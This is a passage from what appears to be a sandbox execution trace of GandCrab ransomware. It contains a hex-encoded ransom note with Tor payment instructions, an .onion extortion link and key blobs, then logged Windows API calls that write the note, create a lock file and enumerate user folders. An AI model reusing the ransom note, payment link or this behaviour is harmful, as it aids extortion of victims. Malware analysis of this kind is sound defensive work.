20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0071.898] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0071.899] CloseHandle (hObject=0x2c4) returned 1 [0071.899] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.900] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.900] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0xd7)) [0071.900] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.900] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0071.900] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0071.900] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a09d2ca4deb61a.lock") returned 102 [0071.900] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\document building blocks\\1033\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0071.901] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.901] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.902] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 78 [0071.902] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0071.902] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503638 [0071.902] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.902] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.902] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.902] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.902] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.902] lstrcmpW (lpString1="16", lpString2=".") returned 1 [0071.902] lstrcmpW (lpString1="16", lpString2="..") returned 1 [0071.902] lstrcatW (in: 